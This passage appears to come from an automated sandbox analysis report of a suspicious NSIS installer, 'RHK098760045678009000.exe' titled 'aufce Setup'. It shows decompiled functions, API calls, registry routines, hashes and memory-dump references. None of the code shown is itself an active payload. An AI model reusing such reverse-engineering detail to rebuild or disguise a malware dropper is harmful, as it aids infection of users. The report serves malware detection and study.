                0x00402bd4
                0x00402be6
                0x00402be6
                0x00402bee

                APIs
                • SetTimer.USER32 ref: 00402B89
                • MulDiv.KERNEL32(0002B400,00000064,?), ref: 00402BB4
                • wsprintfA.USER32 ref: 00402BC4
                • SetWindowTextA.USER32(?,?), ref: 00402BD4
                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                Strings
                • verifying installer: %d%%, xrefs: 00402BBE
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81D50, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E6FF81D50(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a8 < 0xfffffff9 || _a8 > 7) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbd;
					} else {
						 *((intOrPtr*)(_v8 + 0x10)) = _a8;
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
			}




                0x6ff81d57
                0x6ff81d63
                0x6ff81d70
                0x6ff81d7a
                0x6ff81d8c
                0x00000000
                0x6ff81d99
                0x6ff81d9d
                0x6ff81daa
                0x00000000
                0x6ff81db7
                0x6ff81dbd
                0x6ff81dc5
                0x00000000
                0x6ff81dcb
                0x6ff81d9d

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D70
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D8C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DAA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81DC5
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction ID: 0e41a0490ce1e7b7ef196440c0db0a6fcf9247455de27b98c55010cb508b2a3d
                • Opcode Fuzzy Hash: 9317352c0a7d5d4de00f25228884118ec56972fdd8cc1cd13bbef37dcd8f59fb
                • Instruction Fuzzy Hash: 8F014B76511608EFCB04DF98C909BAD7BB4BF0A325F118255F8368A390E7719A40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF819A0, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF819A0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				intOrPtr _t44;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t65;

				_v8 = _a4;
				0x6ff80000("%p %p %p\n", _a4, _a8, _a12, __ecx);
				if(_a12 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						 *_a12 =  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_a12 + 4)) =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_a12 + 8)) =  *((intOrPtr*)(_v8 + 0x2c));
						_t64 = _a12;
						_t44 = _v8;
						 *((intOrPtr*)(_t64 + 0x10)) =  *((intOrPtr*)(_t44 + 0x38));
						 *((intOrPtr*)(_t64 + 0x14)) =  *((intOrPtr*)(_t44 + 0x3c));
						_t58 = _a12;
						_t65 = _v8;
						 *((intOrPtr*)(_t58 + 0x18)) =  *((intOrPtr*)(_t65 + 0x40));
						 *((intOrPtr*)(_t58 + 0x1c)) =  *((intOrPtr*)(_t65 + 0x44));
						 *((intOrPtr*)(_a12 + 0x20)) = 1;
						if(_a8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 8));
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}








                0x6ff819a7
                0x6ff819bb
                0x6ff819c7
                0x6ff819d8
                0x6ff819e2
                0x6ff819f4
                0x00000000
                0x6ff81a01
                0x6ff81a0a
                0x6ff81a15
                0x6ff81a21
                0x6ff81a24
                0x6ff81a27
                0x6ff81a2d
                0x6ff81a33
                0x6ff81a36
                0x6ff81a39
                0x6ff81a3f
                0x6ff81a45
                0x6ff81a4b
                0x6ff81a56
                0x6ff81a61
                0x6ff81a61
                0x6ff81a68
                0x00000000
                0x6ff81a6e
                0x6ff819e2
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF819D8
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF819F4
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p %p$1HDP$p-w
                • API String ID: 3168844106-1182936200
                • Opcode ID: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction ID: bafff0fe1a5e13d61a0074f1e97af541ed4c88eea41878437512ca13e34a9e12
                • Opcode Fuzzy Hash: 8779ea1f3386cd35943b920ee892a5cfe562accf4a78b67c981a174bd7388096
                • Instruction Fuzzy Hash: 933194B8605249DFCB04CF58C580A9ABBB1FF49314F21869AEC298B351D771EE91CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81A80, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF81A80(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p 0x%08x %p %p %p\n", _a4, _a8, _a12, _a16, _a20);
				if(_a20 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_push(_a20);
						_push(_a16 + 0x18);
						_push(_a12 + 0x18);
						_push(_a8);
						_v12 = E6FF82E80(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return _v12;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff81a89
                0x6ff81aa5
                0x6ff81ab1
                0x6ff81abf
                0x6ff81ac9
                0x6ff81adb
                0x00000000
                0x6ff81ae8
                0x6ff81aeb
                0x6ff81af2
                0x6ff81af9
                0x6ff81afd
                0x6ff81b0a
                0x6ff81b12
                0x00000000
                0x6ff81b18
                0x6ff81ac9
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ABF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81ADB
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p 0x%08x %p %p %p$1HDP$p-w
                • API String ID: 3168844106-3684456673
                • Opcode ID: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction ID: 8e7ac4945cc01ebde8e76ba8f4805465fa5d5ab7d2bbf9f337bba271c45fb254
                • Opcode Fuzzy Hash: 40563b7ef54df2a57334cd98b90d399a61d98345b451711807388f2cb7c96a28
                • Instruction Fuzzy Hash: A0112AB6A00209EFCB00DF9CD981E9E3BB9BF49315F108249F9259B351D730A960CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82A30, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E6FF82A30(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				intOrPtr* _t21;
				intOrPtr _t23;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8, __ecx);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t21 = _a8;
						_t23 = _v8;
						 *_t21 =  *((intOrPtr*)(_t23 + 0x20));
						 *((intOrPtr*)(_t21 + 4)) =  *((intOrPtr*)(_t23 + 0x24));
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}






                0x6ff82a37
                0x6ff82a47
                0x6ff82a53
                0x6ff82a61
                0x6ff82a6b
                0x6ff82a7d
                0x00000000
                0x6ff82a8a
                0x6ff82a8a
                0x6ff82a8d
                0x6ff82a93
                0x6ff82a98
                0x6ff82aa0
                0x00000000
                0x6ff82aa6
                0x6ff82a6b
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A61
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A7D
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$1HDP$p-w
                • API String ID: 3168844106-2469439903
                • Opcode ID: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction ID: 7daca4c710bd2feb2f416a34e389d2a7746aac934a1a986fc0d86f17068c23df
                • Opcode Fuzzy Hash: 153bd987c5199ca854553bb16eb3b01ad093b73ffffcdaed60d36cd15477f3b7
                • Instruction Fuzzy Hash: 24012875611108EFCB00CF98D501B5D7BB5FF4A325F218195F8298B300D732AA41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF816E0, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF816E0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(6);
					E6FF82C10(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff816e7
                0x6ff816f3
                0x6ff81700
                0x6ff8170a
                0x6ff8171c
                0x00000000
                0x6ff81729
                0x6ff8172b
                0x6ff81737
                0x6ff81744
                0x00000000
                0x6ff8174a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81700
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8171C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81744
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$1HDP$p-w
                • API String ID: 2978645861-3922659820
                • Opcode ID: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction ID: adddebd697904a7128d75ab29998cae5d3527a1dd3a93d5417fd92b198163e40
                • Opcode Fuzzy Hash: 0001071671235e8000d58f00252c42d68f63b21ff0a6be54bf63dbd18eff3b47
                • Instruction Fuzzy Hash: 5BF0B4B6911208EFDB00DBD4D905B5E7BB8BF06325F214164F83597341E772AA50C692
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81760, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E6FF81760(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					_push(_v8);
					E6FF82EB0(_v8);
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}




                0x6ff81767
                0x6ff81773
                0x6ff81780
                0x6ff8178a
                0x6ff8179c
                0x00000000
                0x6ff817a9
                0x6ff817ac
                0x6ff817ad
                0x6ff817ba
                0x00000000
                0x6ff817c0

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81780
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8179C
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF817BA
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Enter
                • String ID: %p$0HDP$p-w
                • API String ID: 2978645861-675403308
                • Opcode ID: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction ID: c11102cef70b8846710209a50b22d6475f178ca8300329cf6fa1eadb272dca71
                • Opcode Fuzzy Hash: da8da111251ea0f39ddb65e0147ea113eb9f067b695bf7acd7e4908e3c2cb733
                • Instruction Fuzzy Hash: 56F082B5911108EFCB00DBD8D905A9E7BB8BF06325F204269F8359B340E7726A50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82440, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E6FF82440(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr* _a16) {
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t58;
				void* _t60;

				_t31 = _a4;
				0x6ff80000(_t31, _a8, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t31);
				_t60 = _t58 + 0x18;
				if(_a4 == 0) {
					if(_a12 == 0 || _a16 == 0) {
						return 0xc0000bbd;
					} else {
						if(_a8 != 0) {
							_v8 = 0;
							while(1) {
								0x6ff80000(0x6ff84170);
								_t60 = _t60 + 4;
								if(_v8 >= _t31) {
									break;
								}
								_t14 = (_v8 << 5) + 0x6ff84170; // 0x6
								_t31 =  *_t14;
								if(_t31 != _a8) {
									_v8 = _v8 + 1;
									continue;
								}
								_t17 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
								_v12 =  &((wcsrchr( *_t17, 0x5c))[0]);
								_v16 = lstrlenW(_v12) + 1;
								if( *_a16 >= _v16) {
									lstrcpyW(_a12, _v12);
									_v20 = 0;
								} else {
									_v20 = 0x800007d2;
								}
								 *_a16 = _v16;
								return _v20;
							}
							return 0xc0000bbd;
						}
						return 0;
					}
				}
				0x6ff80000("remote machine not supported\n");
				return 0x800007d0;
			}










                0x6ff82452
                0x6ff82456
                0x6ff82464
                0x6ff82469
                0x6ff82470
                0x6ff8248d
                0x00000000
                0x6ff8249f
                0x6ff824a3
                0x6ff824ac
                0x6ff824be
                0x6ff824c3
                0x6ff824c8
                0x6ff824ce
                0x00000000
                0x00000000
                0x6ff824d6
                0x6ff824d6
                0x6ff824df
                0x6ff824bb
                0x00000000
                0x6ff824bb
                0x6ff824e9
                0x6ff824fc
                0x6ff8250c
                0x6ff82517
                0x6ff8252a
                0x6ff82530
                0x6ff82519
                0x6ff82519
                0x6ff82519
                0x6ff8253d
                0x00000000
                0x6ff8253f
                0x00000000
                0x6ff82549
                0x00000000
                0x6ff824a5
                0x6ff8248d
                0x6ff82477
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %s %d %p %p$remote machine not supported
                • API String ID: 0-1546047983
                • Opcode ID: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction ID: 79de6144bbd7d9396980f8bb188bf570c4fa22701763dfa9cd94d90fb42b0fa8
                • Opcode Fuzzy Hash: b90bcf01522cfceac5853696da31d3b4955c124b7a27fcfe097ebeccdb004bed
                • Instruction Fuzzy Hash: 7A315CB1A44208EFDB00CF98D984B9E77B4FF45308F508559E835AB345D376BA50CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                0x00402337
                0x0040233c
                0x00402346
                0x00402350
                0x00402353
                0x0040235d
                0x0040236d
                0x00402374
                0x0040237c
                0x0040238a
                0x0040238e
                0x00402399
                0x00402399
                0x0040239d
                0x004023a1
                0x004023a7
                0x004023ac
                0x004023ac
                0x004023b0
                0x004023bc
                0x004023bc
                0x004023d5
                0x004023d7
                0x004023d7
                0x004023da
                0x004024b0
                0x004024b0
                0x004028c1
                0x004028cd

                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp
                • API String ID: 1356686001-2768858919
                • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004038B4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x58d7c8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "aufce Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x3
						_t27 =  *0x423f68; // 0x58d974
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x58d98c
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                0x004038b8
                0x004038bd
                0x004038c3
                0x004038c8
                0x004038c8
                0x004038d0
                0x00000000
                0x00000000
                0x004038d2
                0x004038d8
                0x004038e0
                0x004038e2
                0x004038e8
                0x004038e8
                0x004038ea
                0x004038f6
                0x00000000
                0x00000000
                0x004038fa
                0x00000000
                0x00000000
                0x00000000
                0x004038fc
                0x00403901
                0x0040390a
                0x00403910
                0x00403915
                0x00403929
                0x00403934
                0x0040394c
                0x00403952
                0x00403957
                0x0040395f
                0x00403980
                0x00403980
                0x00403980
                0x00403961
                0x00403963
                0x00403963
                0x00403967
                0x0040396a
                0x0040396e
                0x0040396e
                0x00403973
                0x00403979
                0x00403979
                0x00000000
                0x00403963
                0x00403917
                0x0040391c
                0x00403925
                0x0040391e
                0x0040391e
                0x0040391e
                0x0040391c

                APIs
                • SetWindowTextA.USER32(00000000,aufce Setup), ref: 0040394C
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: TextWindow
                • String ID: 1033$C:\Users\user\Desktop\RHK098760045678009000.exe 0$[EY$aufce Setup
                • API String ID: 530164218-1479556597
                • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
